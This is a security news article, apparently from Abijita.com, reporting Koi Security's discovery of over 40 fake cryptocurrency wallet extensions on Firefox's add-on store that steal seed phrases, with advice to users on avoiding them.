More than 40 malicious extensions impersonating popular cryptocurrency wallets have been discovered in Mozilla Firefox’s official add-ons store, posing a significant risk to users’ digital assets.
Security researchers from Koi Security uncovered the scam campaign, which is actively targeting unsuspecting users by stealing wallet credentials and seed phrases.
The fake extensions mimic legitimate wallets from providers like MetaMask, Coinbase, Trust Wallet, Phantom, Exodus, OKX, Keplr, and MyMonero, using real brand logos and fake five-star reviews to build trust. Behind the scenes, the extensions include malicious code that detects sensitive input data—such as wallet seed phrases—and silently exfiltrates it to attacker-controlled servers.
According to Koi Security, the group behind the campaign is likely Russian-speaking and has cloned open-source versions of legitimate wallets, injecting code that filters user inputs exceeding 30 characters to capture mnemonic phrases. To avoid detection, error messages are made invisible by setting element opacity to zero.
The campaign has been active since at least April, with new entries appearing in the store as recently as last week. Despite reporting the findings through Mozilla’s official tool, many of the malicious extensions reportedly remain online.
Mozilla has implemented an early detection system to flag suspicious crypto extensions using automated risk indicators, followed by human review. However, Koi Security’s findings suggest the system has failed to catch the full extent of this ongoing threat.
If this article helped you, please consider supporting our work. Every small contribution keeps Abijita.com independent and running.
Users are advised to avoid installing crypto-related extensions from unofficial sources and to verify app legitimacy through wallet providers’ official websites. Installing malicious wallet extensions can lead to irreversible crypto theft that appears as legitimate user-initiated transactions.
